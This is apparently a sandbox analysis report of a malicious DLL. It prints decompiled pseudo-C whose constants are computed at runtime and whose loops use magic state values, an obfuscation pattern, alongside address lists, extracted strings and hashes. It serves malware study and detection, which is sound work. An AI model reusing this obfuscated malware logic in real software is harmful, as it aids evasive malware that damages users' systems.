				_v1736 = 0x771a;
				_v1736 = _v1736 | 0xb1c4750f;
				_v1736 = _v1736 << 1;
				_v1736 = _v1736 ^ 0x6388ee2e;
				_v1728 = 0x5dd0;
				_v1728 = _v1728 ^ 0xc574ab4c;
				_v1728 = _v1728 >> 6;
				_v1728 = _v1728 ^ 0x0315f51a;
				_v1664 = 0xddb9;
				_v1664 = _v1664 + 0xffff4fe8;
				_v1664 = _v1664 ^ 0x00006eba;
				_v1780 = 0xdf96;
				_t420 = 0x6c;
				_v1780 = _v1780 / _t420;
				_v1780 = _v1780 >> 0xe;
				_v1780 = _v1780 + 0x3c2;
				_v1780 = _v1780 ^ 0x00001aa1;
				_v1752 = 0xa0e8;
				_v1752 = _v1752 ^ 0x60a03fe0;
				_v1752 = _v1752 + 0x50a8;
				_v1752 = _v1752 ^ 0x60a0f1df;
				_v1788 = 0x7c65;
				_v1788 = _v1788 | 0x7f65edf7;
				_v1788 = _v1788 + 0xffff24c4;
				_v1788 = _v1788 ^ 0x7f652927;
				_v1660 = 0xe09e;
				_v1660 = _v1660 + 0x154e;
				_v1660 = _v1660 ^ 0x0000df00;
				_v1696 = 0x5030;
				_v1696 = _v1696 + 0x8b64;
				_v1696 = _v1696 ^ 0x0000b2d1;
				_v1744 = 0x51aa;
				_t421 = 0x59;
				_v1744 = _v1744 / _t421;
				_v1744 = _v1744 + 0xffff41dd;
				_v1744 = _v1744 ^ 0xffff4c97;
				_v1772 = 0x5d40;
				_v1772 = _v1772 + 0xffff52be;
				_t422 = 0x5f;
				_v1772 = _v1772 / _t422;
				_v1772 = _v1772 * 0x65;
				_v1772 = _v1772 ^ 0x102a9f87;
				_v1648 = 0x2c0b;
				_v1648 = _v1648 | 0x2763acfb;
				_v1648 = _v1648 ^ 0x27639c89;
				_v1708 = 0x7b1b;
				_v1708 = _v1708 << 8;
				_v1708 = _v1708 >> 9;
				_v1708 = _v1708 ^ 0x00005519;
				_v1684 = 0x285b;
				_v1684 = _v1684 | 0x35f2dfcf;
				_v1684 = _v1684 ^ 0x35f2e73c;
				_v1776 = 0xbe13;
				_v1776 = _v1776 << 4;
				_v1776 = _v1776 ^ 0xfb468464;
				_v1776 = _v1776 * 0x5d;
				_v1776 = _v1776 ^ 0x4b1dd717;
				_v1712 = 0x79ff;
				_v1712 = _v1712 + 0xef26;
				_v1712 = _v1712 ^ 0x7cff6a15;
				_v1712 = _v1712 ^ 0x7cfe3335;
				_v1672 = 0xd60c;
				_v1672 = _v1672 | 0x33f8e32c;
				_v1672 = _v1672 ^ 0x33f89bf8;
				_v1680 = 0xe872;
				_v1680 = _v1680 | 0xc631684a;
				_v1680 = _v1680 ^ 0xc631badc;
				_v1760 = 0xb0f8;
				_v1760 = _v1760 >> 0xa;
				_v1760 = _v1760 + 0xf805;
				_v1760 = _v1760 ^ 0x00009b80;
				_v1796 = 0xaa17;
				_v1796 = _v1796 << 0x10;
				_v1796 = _v1796 + 0x897b;
				_v1796 = _v1796 << 7;
				_v1796 = _v1796 ^ 0x0bc4d7a5;
				_v1716 = 0x2be;
				_v1716 = _v1716 + 0x2f0a;
				_v1716 = _v1716 >> 8;
				_v1716 = _v1716 ^ 0x00007ad6;
				_v1676 = 0x1075;
				_v1676 = _v1676 >> 9;
				_v1676 = _v1676 ^ 0x000029be;
				_v1692 = 0xc758;
				_v1692 = _v1692 | 0x61bc7a14;
				_v1692 = _v1692 ^ 0x61bc9b1c;
				_v1656 = 0x69d1;
				_v1656 = _v1656 + 0x5075;
				_v1656 = _v1656 ^ 0x00009289;
				_v1668 = 0xb9b1;
				_v1668 = _v1668 << 4;
				_v1668 = _v1668 ^ 0x000bc8a5;
				_v1756 = 0x4c19;
				_v1756 = _v1756 | 0xcc613098;
				_v1756 = _v1756 >> 0xc;
				_v1756 = _v1756 ^ 0x000cde69;
				_v1652 = 0x5d5f;
				_v1652 = _v1652 | 0x46b074ae;
				_v1652 = _v1652 ^ 0x46b029f7;
				_v1764 = 0x4f7;
				_v1764 = _v1764 + 0xd743;
				_v1764 = _v1764 << 4;
				_v1764 = _v1764 ^ 0x000db644;
				_v1740 = 0x1545;
				_v1740 = _v1740 | 0x4343a8a1;
				_v1740 = _v1740 + 0x57b1;
				_v1740 = _v1740 ^ 0x434474c8;
				_v1748 = 0xddfe;
				_v1748 = _v1748 * 0x1b;
				_v1748 = _v1748 << 4;
				_v1748 = _v1748 ^ 0x01768619;
				_v1720 = 0x5aa8;
				_v1720 = _v1720 + 0xffffb230;
				_v1720 = _v1720 >> 0xf;
				_v1720 = _v1720 ^ 0x000062f8;
				_v1784 = 0x51ee;
				_v1784 = _v1784 | 0xfef5fbef;
				_v1784 = _v1784 >> 2;
				_v1784 = _v1784 ^ 0x3fbd0f5c;
				_v1792 = 0xc8ac;
				_v1792 = _v1792 >> 5;
				_v1792 = _v1792 + 0x1b3a;
				_v1792 = _v1792 + 0xffff0529;
				_v1792 = _v1792 ^ 0xffff2731;
				_v1688 = 0xaed2;
				_v1688 = _v1688 >> 0xa;
				_v1688 = _v1688 ^ 0x00003e66;
				_v1724 = 0x583a;
				_t423 = 0x58;
				_v1724 = _v1724 / _t423;
				_v1724 = _v1724 ^ 0x598581a9;
				_v1724 = _v1724 ^ 0x5985f8e4;
				_v1732 = 0xfb47;
				_t424 = 9;
				_v1732 = _v1732 / _t424;
				_v1732 = _v1732 + 0x884e;
				_v1732 = _v1732 ^ 0x0000c39c;
				_v1700 = 0x1516;
				_v1700 = _v1700 * 0x3f;
				_v1700 = _v1700 ^ 0x000552bc;
				_t419 = _v1700;
				_v1704 = 0x7274;
				_v1704 = _v1704 + 0xffff5293;
				_v1704 = _v1704 << 6;
				_v1704 = _v1704 ^ 0xfff1329f;
				_v1768 = 0xc63c;
				_v1768 = _v1768 * 0x75;
				_v1768 = _v1768 + 0xffffae6d;
				_v1768 = _v1768 << 0xd;
				_v1768 = _v1768 ^ 0x48fb4ded;
				while(1) {
					_t408 = 0x2e;
					L2:
					while(_t377 != 0xc18631f) {
						if(_t377 == 0x187944ec) {
							_t377 = 0x2d29bb82;
							continue;
						}
						if(_t377 == 0x1c9f6171) {
							__eflags = _v1632 & _v1736;
							if(__eflags == 0) {
								_t364 = _a8( &_v1632, _a12);
								asm("sbb ecx, ecx");
								_t381 =  ~_t364 & 0x07b56504;
								L9:
								_t377 = _t381 + 0x3372c31f;
								while(1) {
									_t408 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1588 - _t408;
							if(_v1588 != _t408) {
								L17:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v1676);
									_push(_v1716);
									_push(_v1796);
									E1000487B(_v1656, __eflags, 0x10001020, _v1668, _v1756, E1000B871(0x10001020, _v1760, __eflags),  &_v520, _a4, _v1652,  &_v1588);
									E100095DD(_v1740,  &_v520, _a8, _a12, _a16, _v1748);
									_t368 = E1000717B(_v1720, _v1784, _v1792, _t370, _v1688);
									_t429 =  &(_t429[0x13]);
									_t408 = 0x2e;
								}
								L16:
								_t377 = 0x3b282823;
								continue;
							}
							__eflags = _v1586;
							if(__eflags == 0) {
								goto L16;
							}
							__eflags = _v1586 - _t408;
							if(_v1586 != _t408) {
								goto L17;
							}
							__eflags = _v1584;
							if(__eflags != 0) {
								goto L17;
							}
							goto L16;
						}
						if(_t377 == 0x2d29bb82) {
							_push(_v1752);
							_push(_v1780);
							_push(_v1664);
							_t365 = E1000B871(0x10001040, _v1728, __eflags);
							E1001C78C(_v1788, __eflags, _v1660, _v1696, _v1744,  &_v1040, _a4);
							_t368 = E1000717B(_v1772, _v1648, _v1708, _t365, _v1684);
							_t429 =  &(_t429[0xb]);
							_t377 = 0xc18631f;
							while(1) {
								_t408 = 0x2e;
								goto L2;
							}
						}
						if(_t377 == 0x3372c31f) {
							return E10011545(_v1700, _v1704, _v1768, _t419);
						}
						if(_t377 != 0x3b282823) {
							L24:
							__eflags = _t377 - 0x1f82b9ce;
							if(__eflags != 0) {
								continue;
							}
							return _t368;
						}
						_t368 = E1001A212( &_v1632, _t419, _v1724, _v1732);
						asm("sbb ecx, ecx");
						_t381 =  ~_t368 & 0xe92c9e52;
						goto L9;
					}
					_t361 = E1000416C( &_v1040, _v1776, _v1712, _v1672,  &_v1632, _v1680);
					_t419 = _t361;
					_t429 =  &(_t429[4]);
					__eflags = _t361 - 0xffffffff;
					if(__eflags == 0) {
						_t377 = 0x1f82b9ce;
						_t408 = 0x2e;
						goto L24;
					}
					_t377 = 0x1c9f6171;
				}
			}

0x100095e6
0x100095ed
0x100095f4
0x100095fb
0x10009602
0x10009609
0x1000960b
0x10009610
0x10009618
0x1000961b
0x10009625
0x10009630
0x10009635
0x1000963d
0x10009645
0x10009649
0x10009651
0x10009659
0x10009661
0x10009666
0x1000966e
0x10009679
0x10009684
0x1000968f
0x1000969d
0x100096a2
0x100096a8
0x100096ad
0x100096b5
0x100096bd
0x100096c5
0x100096cd
0x100096d5
0x100096dd
0x100096e5
0x100096ed
0x100096f5
0x100096fd
0x10009708
0x10009713
0x1000971e
0x10009726
0x1000972e
0x10009736
0x10009742
0x10009747
0x1000974d
0x10009755
0x1000975d
0x10009765
0x10009771
0x10009774
0x1000977d
0x10009781
0x10009789
0x10009794
0x1000979f
0x100097aa
0x100097b2
0x100097b7
0x100097bc
0x100097c4
0x100097cc
0x100097d4
0x100097dc
0x100097e4
0x100097e9
0x100097f8
0x100097fc
0x10009804
0x1000980c
0x10009814
0x1000981c
0x10009824
0x1000982f
0x1000983a
0x10009845
0x10009850
0x1000985b
0x10009866
0x1000986e
0x10009873
0x1000987b
0x10009883
0x1000988b
0x10009890
0x10009898
0x1000989d
0x100098a5
0x100098ad
0x100098b5
0x100098ba
0x100098c2
0x100098cd
0x100098d5
0x100098e0
0x100098e8
0x100098f0
0x100098f8
0x10009903
0x1000990e
0x10009919
0x10009924
0x1000992c
0x10009937
0x1000993f
0x10009947
0x1000994c
0x10009954
0x1000995f
0x1000996a
0x10009975
0x1000997d
0x10009985
0x1000998a
0x10009992
0x1000999a
0x100099a2
0x100099aa
0x100099b2
0x100099bf
0x100099c3
0x100099c8
0x100099d0
0x100099d8
0x100099e0
0x100099e5
0x100099ed
0x100099f5
0x100099fd
0x10009a02
0x10009a0a
0x10009a12
0x10009a17
0x10009a1f
0x10009a27
0x10009a2f
0x10009a37
0x10009a3c
0x10009a46
0x10009a52
0x10009a57
0x10009a5d
0x10009a6a
0x10009a72
0x10009a7e
0x10009a81
0x10009a85
0x10009a8d
0x10009a95
0x10009aa2
0x10009aa6
0x10009aae
0x10009ab2
0x10009aba
0x10009ac2
0x10009ac7
0x10009acf
0x10009adc
0x10009ae0
0x10009ae8
0x10009aed
0x10009af5
0x10009af7
0x00000000
0x10009af8
0x10009b0a
0x10009d03
0x00000000
0x10009d03
0x10009b16
0x10009be2
0x10009be9
0x10009ceb
0x10009cf6
0x10009cf8
0x10009b5c
0x10009b5c
0x10009af5
0x10009af7
0x00000000
0x10009af7
0x10009af5
0x10009bef
0x10009bf7
0x10009c20
0x10009c20
0x10009c28
0x10009c2a
0x10009c36
0x10009c3a
0x10009c85
0x10009cb3
0x10009ccc
0x10009cd1
0x10009cd6
0x10009cd6
0x10009c19
0x10009c19
0x00000000
0x10009c19
0x10009bf9
0x10009c02
0x00000000
0x00000000
0x10009c04
0x10009c0c
0x00000000
0x00000000
0x10009c0e
0x10009c17
0x00000000
0x00000000
0x00000000
0x10009c17
0x10009b22
0x10009b64
0x10009b6d
0x10009b71
0x10009b7c
0x10009bad
0x10009bcc
0x10009bd1
0x10009bd4
0x10009af5
0x10009af7
0x00000000
0x10009af7
0x10009af5
0x10009b2a
0x00000000
0x10009d74
0x10009b32
0x10009d53
0x10009d53
0x10009d59
0x00000000
0x00000000
0x00000000
0x10009d59
0x10009b49
0x10009b54
0x10009b56
0x00000000
0x10009b56
0x10009d32
0x10009d37
0x10009d39
0x10009d3c
0x10009d3f
0x10009d4d
0x10009d52
0x00000000
0x10009d52
0x10009d41
0x10009d41

Strings

f>, xrefs: 10009A3C
e|, xrefs: 100096DD
:X, xrefs: 10009A46
#((;, xrefs: 10009A65
uP, xrefs: 10009903
&, xrefs: 1000980C
/, xrefs: 100098AD
tr, xrefs: 10009AB2
0P, xrefs: 1000971E
_], xrefs: 10009954
Q, xrefs: 100099ED
@], xrefs: 1000975D
r, xrefs: 10009845

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /$#((;$&$0P$:X$@]$_]$e|$f>$r$tr$uP$Q
API String ID: 0-2055608467
Opcode ID: bdb2c5cf6d548e2876975ac3b683f4faf9c02c4f5e795e953b24fb558f1a80ed
Instruction ID: abd06ae9126c2249fefaeb5178a984715da1a4af4ed7290f4f781dbdc19725d1
Opcode Fuzzy Hash: bdb2c5cf6d548e2876975ac3b683f4faf9c02c4f5e795e953b24fb558f1a80ed
Instruction Fuzzy Hash: 2602037150C3809FE364CF61C449A8FBBE1FBC4798F108A1DE59A962A0D7B59948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100084D8, Relevance: 16.6, Strings: 13, Instructions: 332
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E100084D8(intOrPtr __ecx, intOrPtr* __edx, char _a4, intOrPtr _a8) {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				void* _t370;
				intOrPtr _t376;
				short* _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				short _t429;
				void* _t430;
				intOrPtr* _t432;
				signed int* _t433;

				_t433 =  &_v1188;
				_v1124 = 0x4b48;
				_v1124 = _v1124 << 0xe;
				_t432 = __edx;
				_v1044 = __ecx;
				_t429 = 0;
				_t381 = 0x5d;
				_v1124 = _v1124 / _t381;
				_v1124 = _v1124 ^ 0x0033ce71;
				_t430 = 0xd9446cc;
				_v1100 = 0x20d1;
				_v1100 = _v1100 + 0x4bb9;
				_v1100 = _v1100 ^ 0x00006c9a;
				_v1080 = 0xcfd;
				_v1080 = _v1080 ^ 0x36bfce31;
				_v1080 = _v1080 ^ 0x76bfc2cc;
				_v1184 = 0xc8fa;
				_t382 = 0x2c;
				_v1184 = _v1184 * 0x1f;
				_v1184 = _v1184 ^ 0x354b0dcd;
				_v1184 = _v1184 >> 7;
				_v1184 = _v1184 ^ 0x006a9caa;
				_v1056 = 0xb787;
				_v1056 = _v1056 | 0x22ac86d3;
				_v1056 = _v1056 ^ 0x22ac90ee;
				_v1088 = 0xb2dc;
				_v1088 = _v1088 | 0xbac48d87;
				_v1088 = _v1088 ^ 0xbac48bde;
				_v1120 = 0xa619;
				_v1120 = _v1120 ^ 0x8c44aac3;
				_v1120 = _v1120 ^ 0x145d6a21;
				_v1120 = _v1120 ^ 0x98193e58;
				_v1064 = 0x35ac;
				_v1064 = _v1064 | 0x0ee41705;
				_v1064 = _v1064 ^ 0x0ee413ac;
				_v1144 = 0x7709;
				_v1144 = _v1144 * 0x7a;
				_v1144 = _v1144 * 0x64;
				_v1144 = _v1144 | 0xcd9c898e;
				_v1144 = _v1144 ^ 0xdfbcb681;
				_v1112 = 0xe617;
				_v1112 = _v1112 + 0x770a;
				_v1112 = _v1112 ^ 0x1e1545dc;
				_v1112 = _v1112 ^ 0x1e14248e;
				_v1076 = 0x864f;
				_v1076 = _v1076 * 0x2e;
				_v1076 = _v1076 ^ 0x001879dc;
				_v1188 = 0xe5bb;
				_v1188 = _v1188 << 6;
				_v1188 = _v1188 + 0xffffb331;
				_v1188 = _v1188 >> 8;
				_v1188 = _v1188 ^ 0x00007872;
				_v1072 = 0x4383;
				_v1072 = _v1072 / _t382;
				_v1072 = _v1072 ^ 0x000013b5;
				_v1160 = 0x7987;
				_v1160 = _v1160 ^ 0x7bcbcb19;
				_v1160 = _v1160 + 0xa69c;
				_v1160 = _v1160 + 0xffff1c22;
				_v1160 = _v1160 ^ 0x7bcb65db;
				_v1136 = 0xafd4;
				_v1136 = _v1136 * 0x6b;
				_v1136 = _v1136 ^ 0x61f97473;
				_v1136 = _v1136 * 0x7a;
				_v1136 = _v1136 ^ 0x8de4c819;
				_v1164 = 0x3a17;
				_v1164 = _v1164 + 0x56fa;
				_t383 = 0x25;
				_v1164 = _v1164 * 0x5b;
				_v1164 = _v1164 + 0x650e;
				_v1164 = _v1164 ^ 0x0033b8fc;
				_v1048 = 0x4949;
				_v1048 = _v1048 ^ 0xc63473cb;
				_v1048 = _v1048 ^ 0xc6341b06;
				_v1172 = 0x9b2e;
				_v1172 = _v1172 << 4;
				_v1172 = _v1172 ^ 0x92a5fede;
				_v1172 = _v1172 + 0x447;
				_v1172 = _v1172 ^ 0x92ac1b66;
				_v1180 = 0xdebd;
				_v1180 = _v1180 + 0xffffc8b2;
				_v1180 = _v1180 << 1;
				_v1180 = _v1180 + 0xcebf;
				_v1180 = _v1180 ^ 0x00026a8f;
				_v1128 = 0x28a9;
				_v1128 = _v1128 + 0xffffbd33;
				_v1128 = _v1128 | 0xf826b0a8;
				_v1128 = _v1128 ^ 0xffffc99e;
				_v1092 = 0xd5d7;
				_v1092 = _v1092 / _t383;
				_v1092 = _v1092 ^ 0x0000694c;
				_v1096 = 0xd918;
				_v1096 = _v1096 | 0x3a0ebe74;
				_v1096 = _v1096 ^ 0x3a0efb5f;
				_v1156 = 0xd2c8;
				_t384 = 0x53;
				_v1156 = _v1156 / _t384;
				_v1156 = _v1156 >> 4;
				_t385 = 0x7f;
				_v1156 = _v1156 * 0x55;
				_v1156 = _v1156 ^ 0x00007922;
				_v1168 = 0xba73;
				_v1168 = _v1168 ^ 0x64ab3e59;
				_v1168 = _v1168 >> 6;
				_v1168 = _v1168 | 0x7c911bba;
				_v1168 = _v1168 ^ 0x7d93d4e5;
				_v1152 = 0xc3f7;
				_v1152 = _v1152 ^ 0x4435ed9f;
				_v1152 = _v1152 ^ 0x0bb5aebe;
				_v1152 = _v1152 + 0x5f92;
				_v1152 = _v1152 ^ 0x4f809499;
				_v1176 = 0x520a;
				_v1176 = _v1176 << 4;
				_v1176 = _v1176 / _t385;
				_t386 = 0x2d;
				_v1176 = _v1176 / _t386;
				_v1176 = _v1176 ^ 0x00000b06;
				_v1116 = 0x7d75;
				_v1116 = _v1116 ^ 0xfc03be60;
				_v1116 = _v1116 ^ 0xe6c11c04;
				_v1116 = _v1116 ^ 0x1ac2d171;
				_v1052 = 0xe978;
				_t387 = 0x27;
				_v1052 = _v1052 / _t387;
				_v1052 = _v1052 ^ 0x000078f7;
				_v1108 = 0xebfd;
				_v1108 = _v1108 | 0xca3b5ab1;
				_v1108 = _v1108 + 0xfffff815;
				_v1108 = _v1108 ^ 0xca3b9f3f;
				_v1084 = 0x5a1f;
				_v1084 = _v1084 << 7;
				_v1084 = _v1084 ^ 0x002d4373;
				_v1132 = 0xdca3;
				_v1132 = _v1132 + 0xffff6f64;
				_v1132 = _v1132 + 0xffffe865;
				_v1132 = _v1132 ^ 0x11fd3f48;
				_v1132 = _v1132 ^ 0x11fd33e1;
				_v1140 = 0xb962;
				_v1140 = _v1140 | 0x98de224d;
				_t388 = 0x3e;
				_v1140 = _v1140 / _t388;
				_v1140 = _v1140 >> 4;
				_v1140 = _v1140 ^ 0x00271464;
				_v1148 = 0x704d;
				_v1148 = _v1148 >> 0xd;
				_v1148 = _v1148 ^ 0x93c57f48;
				_v1148 = _v1148 + 0xffff7d62;
				_v1148 = _v1148 ^ 0x93c4db43;
				_v1060 = 0xf4af;
				_v1060 = _v1060 >> 7;
				_v1060 = _v1060 ^ 0x00007b80;
				_v1068 = 0xaad8;
				_t389 = 0x38;
				_t379 = _v1044;
				_v1068 = _v1068 / _t389;
				_v1068 = _v1068 ^ 0x00004675;
				_v1104 = 0x5a5b;
				_v1104 = _v1104 * 0x47;
				_v1104 = _v1104 * 0x21;
				_v1104 = _v1104 ^ 0x033a910d;
				do {
					while(_t430 != 0x205004c) {
						if(_t430 == 0xd9446cc) {
							_t430 = 0x390db77a;
							continue;
						} else {
							if(_t430 == 0x1190a355) {
								E1000ADFC(_v1060, _v1068, _t379, _v1104);
							} else {
								if(_t430 == 0x2268f809) {
									_t370 = E100138BB(_v1084, _a4, _v1132,  *_t432,  &_a4, _t379, _t389, _v1140, _v1148);
									_t433 =  &(_t433[7]);
									_t389 = 1;
									_t430 = 0x1190a355;
									__eflags = _t370;
									_t429 =  !=  ? 1 : _t429;
									continue;
								} else {
									if(_t430 == 0x2289a317) {
										_push(_v1136);
										_push(_v1160);
										_push(_v1072);
										E1001BD2C(_v1044, __eflags, E1000B871(_a4, _v1188, __eflags), _v1048,  &_v1040, _a8, _v1172,  &_v520, 0x104, _v1180);
										_t389 = _v1128;
										E1000717B(_t389, _v1092, _v1096, _t371, _v1156);
										_t433 =  &(_t433[0xe]);
										_t430 = 0x304d91b8;
										continue;
									} else {
										if(_t430 == 0x304d91b8) {
											_t389 = _v1168;
											_t376 = E100139A2(_t389, _v1152, 0, _v1176, _v1100, _v1080, _v1124, _t389, _v1116, _v1052, _t389, _a8, _v1108);
											_t379 = _t376;
											_t433 =  &(_t433[0xb]);
											__eflags = _t376 - 0xffffffff;
											if(__eflags != 0) {
												_t430 = 0x2268f809;
												continue;
											}
										} else {
											_t441 = _t430 - 0x390db77a;
											if(_t430 != 0x390db77a) {
												goto L15;
											} else {
												_push(_t389);
												E1001B82F( &_v1040, _v1184, _t441, _v1056);
												_t378 = E100040A7(_v1088,  &_v1040, _v1120, _v1064, _v1144);
												_t433 =  &(_t433[5]);
												_t430 = 0x205004c;
												_t389 = 0;
												 *_t378 = 0;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t429;
					}
					E1001A2E5(_v1112,  &_v520, __eflags, _v1076);
					_pop(_t389);
					_t430 = 0x2289a317;
					L15:
					__eflags = _t430 - 0x2b0f50ff;
				} while (__eflags != 0);
				goto L18;
			}

0x100084d8
0x100084de
0x100084e6
0x100084f3
0x100084f5
0x10008500
0x10008502
0x10008507
0x1000850d
0x10008515
0x1000851a
0x10008522
0x1000852a
0x10008532
0x1000853d
0x10008548
0x10008553
0x10008560
0x10008561
0x10008565
0x1000856d
0x10008572
0x1000857a
0x10008585
0x10008590
0x1000859b
0x100085a3
0x100085ab
0x100085b3
0x100085bb
0x100085c3
0x100085cb
0x100085d3
0x100085de
0x100085e9
0x100085f4
0x10008601
0x1000860a
0x1000860e
0x10008616
0x1000861e
0x10008626
0x1000862e
0x10008636
0x1000863e
0x10008651
0x10008658
0x10008663
0x1000866b
0x10008670
0x10008678
0x1000867d
0x10008685
0x10008699
0x100086a0
0x100086ab
0x100086b3
0x100086bb
0x100086c3
0x100086cb
0x100086d3
0x100086e0
0x100086e4
0x100086f1
0x100086f5
0x100086ff
0x10008707
0x10008716
0x10008719
0x1000871d
0x10008725
0x1000872d
0x10008738
0x10008743
0x1000874e
0x10008756
0x1000875b
0x10008763
0x1000876b
0x10008773
0x1000877b
0x10008783
0x10008787
0x1000878f
0x10008797
0x1000879f
0x100087a7
0x100087af
0x100087b7
0x100087c7
0x100087cb
0x100087d3
0x100087db
0x100087e3
0x100087eb
0x100087f7
0x100087fc
0x10008802
0x1000880c
0x1000880f
0x10008813
0x1000881b
0x10008823
0x1000882b
0x10008830
0x10008838
0x10008840
0x10008848
0x10008850
0x10008858
0x10008860
0x10008868
0x10008870
0x1000887d
0x10008885
0x1000888a
0x10008890
0x10008898
0x100088a0
0x100088a8
0x100088b0
0x100088b8
0x100088ca
0x100088cd
0x100088d6
0x100088e1
0x100088e9
0x100088f1
0x100088f9
0x10008901
0x10008909
0x1000890e
0x10008916
0x1000891e
0x10008926
0x1000892e
0x10008936
0x1000893e
0x10008946
0x10008954
0x10008959
0x1000895f
0x10008964
0x1000896c
0x10008974
0x10008979
0x10008981
0x10008989
0x10008991
0x1000899c
0x100089a4
0x100089af
0x100089c1
0x100089c4
0x100089cb
0x100089d2
0x100089dd
0x100089ea
0x100089f3
0x100089f7
0x100089ff
0x100089ff
0x10008a11
0x10008bb1
0x00000000
0x10008a17
0x10008a1d
0x10008bf9
0x10008a23
0x10008a29
0x10008b97
0x10008b9e
0x10008ba1
0x10008ba2
0x10008ba7
0x10008ba9
0x00000000
0x10008a2f
0x10008a35
0x10008af0
0x10008afb
0x10008aff
0x10008b48
0x10008b60
0x10008b67
0x10008b6c
0x10008b6f
0x00000000
0x10008a3b
0x10008a41
0x10008acd
0x10008ad3
0x10008ad8
0x10008ada
0x10008add
0x10008ae0
0x10008ae6
0x00000000
0x10008ae6
0x10008a43
0x10008a43
0x10008a49
0x00000000
0x10008a4f
0x10008a4f
0x10008a62
0x10008a84
0x10008a89
0x10008a8c
0x10008a91
0x10008a93
0x00000000
0x10008a93
0x10008a49
0x10008a41
0x10008a35
0x10008a29
0x10008a1d
0x10008c00
0x10008c0c
0x10008c0c
0x10008bcd
0x10008bd2
0x10008bd3
0x10008bd8
0x10008bd8
0x10008bd8
0x00000000

Strings

uF, xrefs: 100089D2
HK, xrefs: 100084DE
rx, xrefs: 1000867D
Li, xrefs: 100087CB
R, xrefs: 10008868
Mp, xrefs: 1000896C
u}, xrefs: 10008898
sC-, xrefs: 1000890E
x, xrefs: 100088B8
"y, xrefs: 10008813
[Z, xrefs: 100089DD
II, xrefs: 1000872D
2 MB).All files, xrefs: 100089FF, 10008A8C

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: R$"y$2 MB).All files$HK$II$Li$Mp$[Z$rx$sC-$uF$u}$x
API String ID: 0-2632007781
Opcode ID: 14243db0a6652a7347d74f12ae79b2c995fac47d736910144fd4e1ba056538df
Instruction ID: 38e334a8957e03419512c46c407bf1bba06c4f95f0ddf64ccf543f8a582a7b34
Opcode Fuzzy Hash: 14243db0a6652a7347d74f12ae79b2c995fac47d736910144fd4e1ba056538df
Instruction Fuzzy Hash: 010222715093809FE368CF21C54AA4BFBE1FBC5754F108A1DE2DA862A0DBB59909CF07

Uniqueness

Uniqueness Score: -1.00%

Function 1001C1C2, Relevance: 16.5, Strings: 13, Instructions: 297
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1001C1C2(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				unsigned int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _t305;
				signed int _t312;
				void* _t313;
				signed int _t314;
				signed int _t318;
				signed int _t320;
				intOrPtr _t321;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				void* _t330;
				void* _t331;
				signed int _t358;
				void* _t359;
				void* _t362;
				signed int* _t363;

				_t363 =  &_v132;
				_v16 = 0x98b46;
				_v12 = 0x5f48ac;
				_t358 = 0;
				_t362 = __edx;
				_v8 = 0;
				_v4 = 0;
				_t321 = __ecx;
				_v104 = 0xdc9c;
				_t359 = 0x8a78c3;
				_v104 = _v104 >> 8;
				_t323 = 0x62;
				_v104 = _v104 * 0x4d;
				_v104 = _v104 >> 5;
				_v104 = _v104 ^ 0x000051b0;
				_v112 = 0x6ff3;
				_v112 = _v112 | 0x3c75f1a3;
				_v112 = _v112 + 0xffff5561;
				_v112 = _v112 ^ 0x409d970a;
				_v112 = _v112 ^ 0x7ce8b0bb;
				_v56 = 0x7524;
				_v56 = _v56 | 0x9bb2f2d1;
				_v56 = _v56 ^ 0x9bb2f27b;
				_v44 = 0x7aba;
				_v44 = _v44 | 0x4fd533aa;
				_v44 = _v44 ^ 0x4fd525a6;
				_v116 = 0x4514;
				_v116 = _v116 | 0x0df39fac;
				_v116 = _v116 >> 2;
				_v116 = _v116 / _t323;
				_v116 = _v116 ^ 0x00093cd2;
				_v100 = 0x3b7a;
				_t324 = 0xe;
				_v100 = _v100 * 0x1e;
				_v100 = _v100 + 0x8107;
				_v100 = _v100 * 0x2f;
				_v100 = _v100 ^ 0x015f09bb;
				_v108 = 0x4dde;
				_v108 = _v108 << 9;
				_v108 = _v108 / _t324;
